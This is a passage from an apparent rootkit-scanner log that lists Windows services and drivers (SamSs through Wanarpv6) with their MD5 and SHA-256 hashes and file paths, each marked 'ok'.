09:21:50.0583 0x0304  [ DD17E1573651293D4ED31053795B3471, 94F7D1BB1C3B0C1FAAEED07375DB0F3BC995394FB5C26983548D946C8D229D54 ] SamSs           C:\Windows\system32\lsass.exe
09:21:50.0583 0x0304  SamSs - ok
09:21:50.0614 0x0304  [ 05D860DA1040F111503AC416CCEF2BCA, DAE2F37D09A5A42F945BC8E27E4EA2303521081783A80CEE7FEE7C5A1C2CFC5E ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
09:21:50.0614 0x0304  sbp2port - ok
09:21:50.0645 0x0304  [ 8FC518FFE9519C2631D37515A68009C4, 21E10585470CF9FC3BD1977F8A426686CD2FA6BD2094B9E3594B21C7C4541D25 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
09:21:50.0645 0x0304  SCardSvr - ok
09:21:50.0661 0x0304  [ 0693B5EC673E34DC147E195779A4DCF6, AF1B56FBF3ADABF94CD9DBA67586B8746DE135151F6B3D1B0EE315BC1E2DB670 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
09:21:50.0661 0x0304  scfilter - ok
09:21:50.0714 0x0304  [ A04BB13F8A72F8B6E8B4071723E4E336, E63287FF71C39CBF64C3347C455324C8437F9CF398153E269543588B65389502 ] Schedule        C:\Windows\system32\schedsvc.dll
09:21:50.0714 0x0304  Schedule - ok
09:21:50.0761 0x0304  [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] SCPolicySvc     C:\Windows\System32\certprop.dll
09:21:50.0761 0x0304  SCPolicySvc - ok
09:21:50.0798 0x0304  [ 08236C4BCE5EDD0A0318A438AF28E0F7, 77727F963F63C4CEC11E7AAD5FB3836179701D512CA9436C3170B9E6A4E5F888 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
09:21:50.0798 0x0304  SDRSVC - ok
09:21:50.0845 0x0304  [ 4A5809A1D796E2675AC0332BF7B0CB11, 7EEEC85A397F04A9460DC37A070D115E19114D9A3E5D9D7E8021F60A7986C8C1 ] SeaPort         C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe
09:21:50.0845 0x0304  SeaPort - ok
09:21:50.0883 0x0304  [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] secdrv          C:\Windows\system32\drivers\secdrv.sys
09:21:50.0883 0x0304  secdrv - ok
09:21:50.0899 0x0304  [ A59B3A4442C52060CC7A85293AA3546F, 1776D6DEE51991149265AAF39E17065E301C5FA1FF4068653DC0010B9B27185D ] seclogon        C:\Windows\system32\seclogon.dll
09:21:50.0899 0x0304  seclogon - ok
09:21:50.0915 0x0304  [ DCB7FCDCC97F87360F75D77425B81737, F8289AF2C458C167038EEFE613EE5E3D6D5B3308B8784168374BC81C47891CE5 ] SENS            C:\Windows\system32\sens.dll
09:21:50.0915 0x0304  SENS - ok
09:21:50.0946 0x0304  [ 50087FE1EE447009C9CC2997B90DE53F, B5E6CF1D991F87C29C5E28198E0962E31FFB499A46C3BD43FC20391693389959 ] SensrSvc        C:\Windows\system32\sensrsvc.dll
09:21:50.0946 0x0304  SensrSvc - ok
09:21:50.0961 0x0304  [ 9AD8B8B515E3DF6ACD4212EF465DE2D1, E2F019BCD1446236D078D46065DD151DD068778F33BE2F1E8A0CC1EA2F954E86 ] Serenum         C:\Windows\system32\DRIVERS\serenum.sys
09:21:50.0977 0x0304  Serenum - ok
09:21:50.0983 0x0304  [ 5FB7FCEA0490D821F26F39CC5EA3D1E2, A26DB2EB9F3E2509B4EBA949DB97595CC32332D9321DF68283BFC102E66D766F ] Serial          C:\Windows\system32\DRIVERS\serial.sys
09:21:50.0983 0x0304  Serial - ok
09:21:50.0999 0x0304  [ 79BFFB520327FF916A582DFEA17AA813, 7A2A9D69BE02228591186A9F4453D4B5FD98837CA422C873C48040170E8BD18C ] sermouse        C:\Windows\system32\DRIVERS\sermouse.sys
09:21:50.0999 0x0304  sermouse - ok
09:21:51.0045 0x0304  [ 4AE380F39A0032EAB7DD953030B26D28, C8F5F2DD59574E966FDF3057867BB959A554BAB6FD5DC6F1427094A6BC2B2809 ] SessionEnv      C:\Windows\system32\sessenv.dll
09:21:51.0045 0x0304  SessionEnv - ok
09:21:51.0080 0x0304  [ 9F976E1EB233DF46FCE808D9DEA3EB9C, 6A5C53F27F8BCA85CE206EE7D196176F67EC6FFA5D4830373A20792C149B5E75 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
09:21:51.0081 0x0304  sffdisk - ok
09:21:51.0083 0x0304  [ 932A68EE27833CFD57C1639D375F2731, 11D6B98FBEEE2B9C7B06EF7091857BBD3B349077997D6261D66280668FD1B5C3 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
09:21:51.0098 0x0304  sffp_mmc - ok
09:21:51.0098 0x0304  [ 6D4CCAEDC018F1CF52866BBBAA235982, AAC41F5C97B3FE5A3DC0838457EB8CC9BB71FCA16D3EDBB67D603F0A9D46C131 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
09:21:51.0098 0x0304  sffp_sd - ok
09:21:51.0129 0x0304  [ DB96666CC8312EBC45032F30B007A547, C3AE60FC65A36E96E0D2CC6E184481D70F91A19DC3E2E17E2873DD670A592DD7 ] sfloppy         C:\Windows\system32\DRIVERS\sfloppy.sys
09:21:51.0129 0x0304  sfloppy - ok
09:21:51.0161 0x0304  [ D1A079A0DE2EA524513B6930C24527A2, E2BC16DBCF38841EECD49C6FA1A9AC89C17F332F12606CA826F058E995E1B83D ] SharedAccess    C:\Windows\System32\ipnathlp.dll
09:21:51.0179 0x0304  SharedAccess - ok
09:21:51.0199 0x0304  [ 414DA952A35BF5D50192E28263B40577, 9C9BAFB9880DA6CC728506A142BE124E186219610DCC3460657A3CA93C865DF1 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
09:21:51.0199 0x0304  ShellHWDetection - ok
09:21:51.0214 0x0304  [ 2565CAC0DC9FE0371BDCE60832582B2E, 1A775214E86B83C2F1799F12D71077D81C89AD32734A248BA88787B7F104B79D ] sisagp          C:\Windows\system32\drivers\sisagp.sys
09:21:51.0214 0x0304  sisagp - ok
09:21:51.0261 0x0304  [ A9F0486851BECB6DDA1D89D381E71055, 7E909538AB758C18AC2CCBFFEE17BA36FA6ED2E674AA70924AA87AC61375FF35 ] SiSRaid2        C:\Windows\system32\DRIVERS\SiSRaid2.sys
09:21:51.0261 0x0304  SiSRaid2 - ok
09:21:51.0277 0x0304  [ 3727097B55738E2F554972C3BE5BC1AA, 75D52A596A298C33EC79A3B0B80F25492C08A182ABC679401502DA9597687566 ] SiSRaid4        C:\Windows\system32\DRIVERS\sisraid4.sys
09:21:51.0277 0x0304  SiSRaid4 - ok
09:21:51.0326 0x0304  [ BB2FACF58F87C299E823110C7921619C, 0811A406E89BF9A8B94A900A54C7043AEB3F317C2078177C52053F67F84CB7A2 ] SiteAdvisor Service C:\Program Files\SiteAdvisor\6173\SAService.exe
09:21:51.0326 0x0304  SiteAdvisor Service - ok
09:21:51.0341 0x0304  [ 3E21C083B8A01CB70BA1F09303010FCE, 803F8F91299C387110F34A49340E7136AAE91B418E2977A36285EA8F432FF197 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
09:21:51.0341 0x0304  Smb - ok
09:21:51.0385 0x0304  [ 6A984831644ECA1A33FFEAE4126F4F37, 753E23D2B33D47C52C05D892B052CFD96D93B97FB6E9FCB58EF1E4C4A125BF78 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
09:21:51.0385 0x0304  SNMPTRAP - ok
09:21:51.0424 0x0304  [ 95CF1AE7527FB70F7816563CBC09D942, CE8BACB91A5A86CBCE82619C6C1873B4D7593B00CED3B522E41B8F7F6258CC65 ] spldr           C:\Windows\system32\drivers\spldr.sys
09:21:51.0425 0x0304  spldr - ok
09:21:51.0504 0x0304  [ 9AEA093B8F9C37CF45538382CABA2475, CC63239C412067AA72318ADB8BB80BCDF2CA60DA05D814D32753C92508BC16A8 ] Spooler         C:\Windows\System32\spoolsv.exe
09:21:51.0519 0x0304  Spooler - ok
09:21:51.0630 0x0304  [ CF87A1DE791347E75B98885214CED2B8, 7AF4E03D751C951A4E5FBA28200DABFE6B3BF055490163EEEEA84EBA4D0F368A ] sppsvc          C:\Windows\system32\sppsvc.exe
09:21:51.0682 0x0304  sppsvc - ok
09:21:51.0729 0x0304  [ B0180B20B065D89232A78A40FE56EAA6, 4D045B23AD58A8822BE9F20119744A8D47455469D54494745CEB099951DA60FF ] sppuinotify     C:\Windows\system32\sppuinotify.dll
09:21:51.0729 0x0304  sppuinotify - ok
09:21:51.0782 0x0304  [ E4C2764065D66EA1D2D3EBC28FE99C46, 043AEF06A23069DD17675955C834690A5FD8F1948A05B3969F977E823C4E25F5 ] srv             C:\Windows\system32\DRIVERS\srv.sys
09:21:51.0782 0x0304  srv - ok
09:21:51.0797 0x0304  [ 03F0545BD8D4C77FA0AE1CEEDFCC71AB, 4DF31206DF8F33C2975E23C7257ED930C4EDA8BC4E246D8FDA130BB583083ED0 ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
09:21:51.0797 0x0304  srv2 - ok
09:21:51.0813 0x0304  [ BE6BD660CAA6F291AE06A718A4FA8ABC, CD38939CFBA80B882D38099194FC1EBAE15A9D27A4D941DD03C55EC745E52E59 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
09:21:51.0828 0x0304  srvnet - ok
09:21:51.0844 0x0304  [ D887C9FD02AC9FA880F6E5027A43E118, F38BAD90EC791368C37C21090302708D2DFB83ECE9096609AD9AA667B2E5592E ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
09:21:51.0844 0x0304  SSDPSRV - ok
09:21:51.0860 0x0304  [ D318F23BE45D5E3A107469EB64815B50, D74355E6FF215AA8CE53BC9DF16AF2740F2FC2FD754939478A3608BDA8C6DDA0 ] SstpSvc         C:\Windows\system32\sstpsvc.dll
09:21:51.0860 0x0304  SstpSvc - ok
09:21:51.0882 0x0304  [ DB32D325C192B801DF274BFD12A7E72B, F089DBA719E22BC269720A6B840B873A4AF5639745DB0C3DBC8BD2F2839A1ABA ] stexstor        C:\Windows\system32\DRIVERS\stexstor.sys
09:21:51.0882 0x0304  stexstor - ok
09:21:51.0945 0x0304  [ E1FB3706030FB4578A0D72C2FC3689E4, A62EC9AA4514CAF2A10C0A3AEF7A36F593A7E7DA370A3F130C24E1B612E19427 ] StiSvc          C:\Windows\System32\wiaservc.dll
09:21:51.0945 0x0304  StiSvc - ok
09:21:51.0982 0x0304  [ 472AF0311073DCECEAA8FA18BA2BDF89, 089414057EB2047E42C96C1ACE79D509967461DC5A4D2836F63C04268637A3FC ] storflt         C:\Windows\system32\drivers\vmstorfl.sys
09:21:51.0982 0x0304  storflt - ok
09:21:51.0997 0x0304  [ 0BF669F0A910BEDA4A32258D363AF2A5, 83EEBACDE4F69A2866B69CAA633F5C8B3CB01D88CEDB01B6EA5988E0A25CEE47 ] StorSvc         C:\Windows\system32\storsvc.dll
09:21:51.0997 0x0304  StorSvc - ok
09:21:52.0029 0x0304  [ DCAFFD62259E0BDB433DD67B5BB37619, CBD12FF9BBF33D18B0F3D322B12EC62E7DF3BF45C6AD43D2E91FF4C4762E05D0 ] storvsc         C:\Windows\system32\drivers\storvsc.sys
09:21:52.0029 0x0304  storvsc - ok
09:21:52.0029 0x0304  [ E58C78A848ADD9610A4DB6D214AF5224, 1575A90EB22A4FB066459BDA00C6CAC10198C3C8C74493721EC6D34B51F50426 ] swenum          C:\Windows\system32\drivers\swenum.sys
09:21:52.0044 0x0304  swenum - ok
09:21:52.0060 0x0304  [ A28BD92DF340E57B024BA433165D34D7, 889CC7FF143C3549982128473FF927CD80CF36485A347EF399C1271C8CE12CE4 ] swprv           C:\Windows\System32\swprv.dll
09:21:52.0060 0x0304  swprv - ok
09:21:52.0129 0x0304  [ 36650D618CA34C9D357DFD3D89B2C56F, 7C3774E53DCF32CB3A4B3504E32D2A651E18467FA0A6AC4C7993C696741B704B ] SysMain         C:\Windows\system32\sysmain.dll
09:21:52.0145 0x0304  SysMain - ok
09:21:52.0182 0x0304  [ 763FECDC3D30C815FE72DD57936C6CD1, 1A62C7E63E426D56894F4121C75D9C60FC9A14469ADBD0D6F0B94B8DE48CDA3E ] TabletInputService C:\Windows\System32\TabSvc.dll
09:21:52.0198 0x0304  TabletInputService - ok
09:21:52.0229 0x0304  [ 613BF4820361543956909043A265C6AC, FCFF02E466D2501630B452627FB218C01E5245A0921EE3D2117E7FD63AC7E98E ] TapiSrv         C:\Windows\System32\tapisrv.dll
09:21:52.0229 0x0304  TapiSrv - ok
09:21:52.0260 0x0304  [ B799D9FDB26111737F58288D8DC172D9, 409A60819A4305699E2E492A6190637FAAEBD19E745A5DB2A5D6977106C86591 ] TBS             C:\Windows\System32\tbssvc.dll
09:21:52.0260 0x0304  TBS - ok
09:21:52.0322 0x0304  [ 5579DD18546999F5D0EC39D018726C6B, 82432BACEE75C34F21222D9CC1607223C2940947118A63DB239777A4B1442AD3 ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
09:21:52.0354 0x0304  Tcpip - ok
09:21:52.0398 0x0304  [ 5579DD18546999F5D0EC39D018726C6B, 82432BACEE75C34F21222D9CC1607223C2940947118A63DB239777A4B1442AD3 ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
09:21:52.0413 0x0304  TCPIP6 - ok
09:21:52.0460 0x0304  [ 3EEBD3BD93DA46A26E89893C7AB2FF3B, 2C7204DCD2BCBC6A250FF0F6477616F327AF41FDB7CABE69E5C357361009FB4E ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
09:21:52.0460 0x0304  tcpipreg - ok
09:21:52.0497 0x0304  [ 1CB91B2BD8F6DD367DFC2EF26FD751B2, 879E2827354BB21573AC6A7CCEB746D44214540687E6882FFCB4089546FBD954 ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
09:21:52.0497 0x0304  TDPIPE - ok
09:21:52.0513 0x0304  [ 2C2C5AFE7EE4F620D69C23C0617651A8, E828D974C3F9D7004A030C3AD448096C736FDB4C4C1707D043E567D08C845103 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
09:21:52.0513 0x0304  TDTCP - ok
09:21:52.0544 0x0304  [ B459575348C20E8121D6039DA063C704, 1B4328A9EA39FF5A57F258E02254D04B73455F1DF7C997C13702A8B2F12D0347 ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
09:21:52.0544 0x0304  tdx - ok
09:21:52.0560 0x0304  [ 04DBF4B01EA4BF25A9A3E84AFFAC9B20, 0D81B427720637882077C5024D738191F858FC734ED040697872D906351EF663 ] TermDD          C:\Windows\system32\drivers\termdd.sys
09:21:52.0560 0x0304  TermDD - ok
09:21:52.0598 0x0304  [ E05E31F7BF577228E27CFFCA5B54ABBD, BF053DE7FA6DF33E15D0DD421F34962D92575ED163E4A605FE6B8DA9CEA5CF55 ] TermService     C:\Windows\System32\termsrv.dll
09:21:52.0614 0x0304  TermService - ok
09:21:52.0629 0x0304  [ 42FB6AFD6B79D9FE07381609172E7CA4, B57C85091209A2FAD19ED490B8FA7FC98F12911F9C9CACE9AF1E540780CE6700 ] Themes          C:\Windows\system32\themeservice.dll
09:21:52.0629 0x0304  Themes - ok
09:21:52.0645 0x0304  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] THREADORDER     C:\Windows\system32\mmcss.dll
09:21:52.0660 0x0304  THREADORDER - ok
09:21:52.0682 0x0304  [ 5AD05191DC8B444A7BA4D79B76C42A30, 6166E939A5A240388EBA5AF7FF335DC413F2BBCF74C2E1D310F4BE2A5454A610 ] TPM             C:\Windows\system32\drivers\tpm.sys
09:21:52.0682 0x0304  TPM - ok
09:21:52.0698 0x0304  [ 4792C0378DB99A9BC2AE2DE6CFFF0C3A, 532A3A812578B2DFD83001DE66FC73689D79EC729409EB572E07E6D65B281712 ] TrkWks          C:\Windows\System32\trkwks.dll
09:21:52.0713 0x0304  TrkWks - ok
09:21:52.0813 0x0304  [ 2C49B175AEE1D4364B91B531417FE583, 6C7995E18F84E465C376D1D5F153C15ACB66CDEA86EE5BF186677F572E7E129B ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
09:21:52.0813 0x0304  TrustedInstaller - ok
09:21:52.0844 0x0304  [ 6C5139E4283249518F7743D7043775B3, 58684E8C90EBAC65459A97C905CDCFE3A915CFF7E8E96071DE1AC3489F85E67F ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
09:21:52.0844 0x0304  tssecsrv - ok
09:21:52.0898 0x0304  [ FD1D6C73E6333BE727CBCC6054247654, 6F7B9AE1A5986204DB3348D13B303F30FC17624939DA74D6BD114FAEED0FB30E ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
09:21:52.0898 0x0304  TsUsbFlt - ok
09:21:52.0929 0x0304  [ B2FA25D9B17A68BB93D58B0556E8C90D, 0146931B733CAB1CD87F94C35F97E110D6ED6C55EAFF03345400A29AEDE99BDE ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
09:21:52.0929 0x0304  tunnel - ok
09:21:52.0960 0x0304  [ 750FBCB269F4D7DD2E420C56B795DB6D, E1A95C59148FE463539C34336FD0E74B31A33B8AB2B8E34AA10349C3347471D7 ] uagp35          C:\Windows\system32\DRIVERS\uagp35.sys
09:21:52.0960 0x0304  uagp35 - ok
09:21:52.0982 0x0304  [ EE43346C7E4B5E63E54F927BABBB32FF, BAD6FC3BEE45E644D5A6A0A31428F5B2AEC72A0AA0C74EF8177B1FE23EEF3AA9 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
09:21:52.0982 0x0304  udfs - ok
09:21:53.0013 0x0304  [ 8344FD4FCE927880AA1AA7681D4927E5, 1B54EFA60A221E2B9FFE59BB41C7E7D8B5AC6826F1C5577456D81371D464255A ] UI0Detect       C:\Windows\system32\UI0Detect.exe
09:21:53.0013 0x0304  UI0Detect - ok
09:21:53.0060 0x0304  [ 44E8048ACE47BEFBFDC2E9BE4CBC8880, 5D96D90FDF68AE470CC92CA9DF9DA2C05A53EF455A5A109DBBF7C96F3238257C ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
09:21:53.0060 0x0304  uliagpkx - ok
09:21:53.0098 0x0304  [ D295BED4B898F0FD999FCFA9B32B071B, D4130DB4AE76EE6DC0B8E7A4FEF5CB8B26EBD822C21021F6FA78FD29C1E211C2 ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
09:21:53.0098 0x0304  umbus - ok
09:21:53.0114 0x0304  [ 7550AD0C6998BA1CB4843E920EE0FEAC, 24C001E422C3B3B920CDCF6003A3179CE464DE4284775403DD5122EF9780460D ] UmPass          C:\Windows\system32\DRIVERS\umpass.sys
09:21:53.0114 0x0304  UmPass - ok
09:21:53.0145 0x0304  [ 409994A8EACEEE4E328749C0353527A0, FFC57B647147DE2957A7DE4B330CC534DE7AC892A2FCE3BB164F7A516CAB1B56 ] UmRdpService    C:\Windows\System32\umrdp.dll
09:21:53.0145 0x0304  UmRdpService - ok
09:21:53.0244 0x0304  [ D47E82866A6FF02DAE9CEDF127C4BEE0, 15F2F637470859672FE93EAE03062C966FFE72F38FADB586B9C0DBC0C635A797 ] UNS             C:\Program Files\Common Files\Intel\Privacy Icon\UNS\UNS.exe
09:21:53.0276 0x0304  UNS - ok
09:21:53.0332 0x0304  [ 833FBB672460EFCE8011D262175FAD33, C0C3067A305993CBF056C229771CB0593DD60C9C7AC5130FF1CA610BCA812AB5 ] upnphost        C:\Windows\System32\upnphost.dll
09:21:53.0332 0x0304  upnphost - ok
09:21:53.0363 0x0304  [ 0803FBA9FE829D61AE26EC0BCC910C46, 30D00E2C7DFC630C99C1599587D4F9C272BC30D444E07C961AA05BF84587806B ] usbccgp         C:\Windows\system32\drivers\usbccgp.sys
09:21:53.0363 0x0304  usbccgp - ok
09:21:53.0394 0x0304  [ 2352AB5F9F8F097BF9D41D5A4718A041, 25BC7828C625B9B2A5110C25B230C5828CEC18EC97ECF9EC4745E8930CBF472C ] usbcir          C:\Windows\system32\drivers\usbcir.sys
09:21:53.0410 0x0304  usbcir - ok
09:21:53.0434 0x0304  [ D40855F89B69305140BBD7E9A3BA2DA6, 745DC6D770666F6B19C2B6AA89C21D1A314732E291453BFA2367F9AF86F97C3C ] usbehci         C:\Windows\system32\DRIVERS\usbehci.sys
09:21:53.0434 0x0304  usbehci - ok
09:21:53.0482 0x0304  [ EDF2DF71C4F1E13A6AC75F5224DE655A, 1764D155C6B99201774B57195349304259232A12868ECFC2069CA49443EBDC2C ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
09:21:53.0482 0x0304  usbhub - ok
09:21:53.0513 0x0304  [ 9828C8D14CC2676421778F0DE638CF97, 479A28211FFB85190A01FAB0283B927588805D2C0CDB03F85F8F814B88E4F453 ] usbohci         C:\Windows\system32\drivers\usbohci.sys
09:21:53.0513 0x0304  usbohci - ok
09:21:53.0544 0x0304  [ 797D862FE0875E75C7CC4C1AD7B30252, 1BBE745E4C85F8911076F6032ACD7A35FAC048D3CB1500C64E08D8B2C70A1069 ] usbprint        C:\Windows\system32\DRIVERS\usbprint.sys
09:21:53.0544 0x0304  usbprint - ok
09:21:53.0582 0x0304  [ F991AB9CC6B908DB552166768176896A, AD8E7A16B23B244B7F834622D4E38B5844193C6E31EF96F61E0E2EA16C945026 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
09:21:53.0582 0x0304  USBSTOR - ok
09:21:53.0597 0x0304  [ 800AABFD625EEFF899F7E5496BDE37AB, 3EB7ED07760CB348FCA9A06C2B838EF79B51A83C5F70A9C9EAAEAE54480067E2 ] usbuhci         C:\Windows\system32\DRIVERS\usbuhci.sys
09:21:53.0597 0x0304  usbuhci - ok
09:21:53.0613 0x0304  [ 081E6E1C91AEC36758902A9F727CD23C, 9FDAA17A3B99067E035E5D76305427F15FFDBC5D304B2BB78AFC6463EDDE1A75 ] UxSms           C:\Windows\System32\uxsms.dll
09:21:53.0613 0x0304  UxSms - ok
09:21:53.0628 0x0304  [ DD17E1573651293D4ED31053795B3471, 94F7D1BB1C3B0C1FAAEED07375DB0F3BC995394FB5C26983548D946C8D229D54 ] VaultSvc        C:\Windows\system32\lsass.exe
09:21:53.0628 0x0304  VaultSvc - ok
09:21:53.0644 0x0304  [ A059C4C3EDB09E07D21A8E5C0AABD3CB, BDD3729B49DF2E2FC72FFEF9D10235B481A671DE5A721B6B9A80873B7A343F07 ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
09:21:53.0644 0x0304  vdrvroot - ok
09:21:53.0698 0x0304  [ C3CD30495687C2A2F66A65CA6FD89BE9, 582E4706C1D6A151020D14B26C7BF166F4E42BDD6E410F30EC452469270C5E9B ] vds             C:\Windows\System32\vds.exe
09:21:53.0698 0x0304  vds - ok
09:21:53.0713 0x0304  [ 17C408214EA61696CEC9C66E388B14F3, 829C0416672E2B2DFABCFE641E7F281F41E8DBB3C0EF11C7784CB9BB94F87E97 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
09:21:53.0713 0x0304  vga - ok
09:21:53.0745 0x0304  [ 8E38096AD5C8570A6F1570A61E251561, 4DBA3C1397A2203548F45F006E66D99F837903F601ABBCE2304754F783CA8A39 ] VgaSave         C:\Windows\System32\drivers\vga.sys
09:21:53.0745 0x0304  VgaSave - ok
09:21:53.0782 0x0304  [ 5461686CCA2FDA57B024547733AB42E3, 2721D0659AA890172FCAD4EC4D926B58ACD0EE4887DA51545DC7237420D5BF84 ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
09:21:53.0782 0x0304  vhdmp - ok
09:21:53.0813 0x0304  [ C829317A37B4BEA8F39735D4B076E923, 55D1796AE750071E1E05BD7702B6C355CCFFE27B4C00E93E7044C3184732B497 ] viaagp          C:\Windows\system32\drivers\viaagp.sys
09:21:53.0813 0x0304  viaagp - ok
09:21:53.0813 0x0304  [ E02F079A6AA107F06B16549C6E5C7B74, B530DCE3EE4F285B3D5F69F7148D17E016D54F04E6F93706B829A34567748788 ] ViaC7           C:\Windows\system32\DRIVERS\viac7.sys
09:21:53.0813 0x0304  ViaC7 - ok
09:21:53.0860 0x0304  [ E43574F6A56A0EE11809B48C09E4FD3C, 3687BF638E21C00E62ABFED70D728B91ADA08F7164CA898E654F31DA196589E9 ] viaide          C:\Windows\system32\drivers\viaide.sys
09:21:53.0860 0x0304  viaide - ok
09:21:53.0898 0x0304  [ C2F2911156FDC7817C52829C86DA494E, FE499F189B5016FCE0018AA3DE3970B72275B7B15F3D4D608117F6DDEC6B90DC ] vmbus           C:\Windows\system32\drivers\vmbus.sys
09:21:53.0898 0x0304  vmbus - ok
09:21:53.0914 0x0304  [ D4D77455211E204F370D08F4963063CE, 2018B2A84C73E0834200A594C02A9D28C74906F126DAD3CCDDFC9CD9A61669E2 ] VMBusHID        C:\Windows\system32\drivers\VMBusHID.sys
09:21:53.0914 0x0304  VMBusHID - ok
09:21:53.0929 0x0304  [ 4C63E00F2F4B5F86AB48A58CD990F212, 9796BD4B9CFEEEAF57C5E332A732EFC2770B21F9B35301A5D202F5FC52C1E035 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
09:21:53.0929 0x0304  volmgr - ok
09:21:53.0960 0x0304  [ B5BB72067DDDDBBFB04B2F89FF8C3C87, 65B9AD55F43940A5FDD88B6EC5034A7E375DF8E6F5F1AE6519A4BD6B7E992EBC ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
09:21:53.0960 0x0304  volmgrx - ok
09:21:53.0982 0x0304  [ F497F67932C6FA693D7DE2780631CFE7, DAE544ED99D2CF570DA31343BD87D2F856D0D13529656D38E1BF854C77F017F6 ] volsnap         C:\Windows\system32\drivers\volsnap.sys
09:21:53.0982 0x0304  volsnap - ok
09:21:54.0013 0x0304  [ B26536ADD1D748CDA104D856C979AE79, C88FBCD63DB3607232616FAB989F0FD7FB00ED542E6AC1BC76076A7C13A6FB22 ] vpcbus          C:\Windows\system32\DRIVERS\vpchbus.sys
09:21:54.0013 0x0304  vpcbus - ok
09:21:54.0060 0x0304  [ A0F7E923A6261760130F22B85DF9040E, E70ED14497262C75CC2D4B67B046BB43D8F47A4B8487D258694891E9B4C6DA44 ] vpcnfltr        C:\Windows\system32\DRIVERS\vpcnfltr.sys
09:21:54.0060 0x0304  vpcnfltr - ok
09:21:54.0097 0x0304  [ 5F4B55E91CE7E2523C9E1E0ECE858869, 3C395198C1845A15C4E39888383587A5E481E2761B885DBB5FC2C17C7075E6B4 ] vpcusb          C:\Windows\system32\DRIVERS\vpcusb.sys
09:21:54.0113 0x0304  vpcusb - ok
09:21:54.0128 0x0304  [ B487191FE18D6863381A1AC55482469A, 77A6C87E833E90FFD2FF51C6B28041D8AE9C6CE293DA4166E65470C18C017971 ] vpcvmm          C:\Windows\system32\drivers\vpcvmm.sys
09:21:54.0128 0x0304  vpcvmm - ok
09:21:54.0178 0x0304  [ 9DFA0CC2F8855A04816729651175B631, 37FD9E43A2A3F125E94A315FB4CD8A1B5499A5FD74806EB2D1E5DA88C070D3A3 ] vsmraid         C:\Windows\system32\DRIVERS\vsmraid.sys
09:21:54.0180 0x0304  vsmraid - ok
09:21:54.0229 0x0304  [ 209A3B1901B83AEB8527ED211CCE9E4C, 1A431F6409F8E0531F600F8F988ECECECB902DA26BBAAF1DE74A5CAC29A7CB44 ] VSS             C:\Windows\system32\vssvc.exe
09:21:54.0245 0x0304  VSS - ok
09:21:54.0278 0x0304  [ 90567B1E658001E79D7C8BBD3DDE5AA6, EFC23BEEA7F54A2DC56CB523DAD1AF0358D904C5278BF08873910E2DB3F13557 ] vwifibus        C:\Windows\system32\DRIVERS\vwifibus.sys
09:21:54.0279 0x0304  vwifibus - ok
09:21:54.0285 0x0304  [ 7090D3436EEB4E7DA3373090A23448F7, 3A130B28F2BFA7DCEC8596C4CE4E187B019F5ECF1AAC8DD1BBDE9CBD2428FEC2 ] vwififlt        C:\Windows\system32\DRIVERS\vwififlt.sys
09:21:54.0285 0x0304  vwififlt - ok
09:21:54.0300 0x0304  [ A3F04CBEA6C2A10E6CB01F8B47611882, 32AFE18B07FECA30BC95831A5DC94C784E543784DF16165334A777DC84E91EF3 ] vwifimp         C:\Windows\system32\DRIVERS\vwifimp.sys
09:21:54.0300 0x0304  vwifimp - ok
09:21:54.0332 0x0304  [ 55187FD710E27D5095D10A472C8BAF1C, AE298E2D3BA366BCBDC092C717214C181E8843FA564A6DFB07FC3238A5A68DC3 ] W32Time         C:\Windows\system32\w32time.dll
09:21:54.0347 0x0304  W32Time - ok
09:21:54.0365 0x0304  [ DE3721E89C653AA281428C8A69745D90, 501C78056ED4295625D8A5412025FD2F0CA24077044D3A5800BA79DF3D946516 ] WacomPen        C:\Windows\system32\DRIVERS\wacompen.sys
09:21:54.0366 0x0304  WacomPen - ok
09:21:54.0397 0x0304  [ 3C3C78515F5AB448B022BDF5B8FFDD2E, 35284174A42039C3C1FF8A3C8BC187A5E067C7782FC62D19749C2CB28C4E36C7 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
09:21:54.0397 0x0304  WANARP - ok
09:21:54.0413 0x0304  [ 3C3C78515F5AB448B022BDF5B8FFDD2E, 35284174A42039C3C1FF8A3C8BC187A5E067C7782FC62D19749C2CB28C4E36C7 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
09:21:54.0415 0x0304  Wanarpv6 - ok
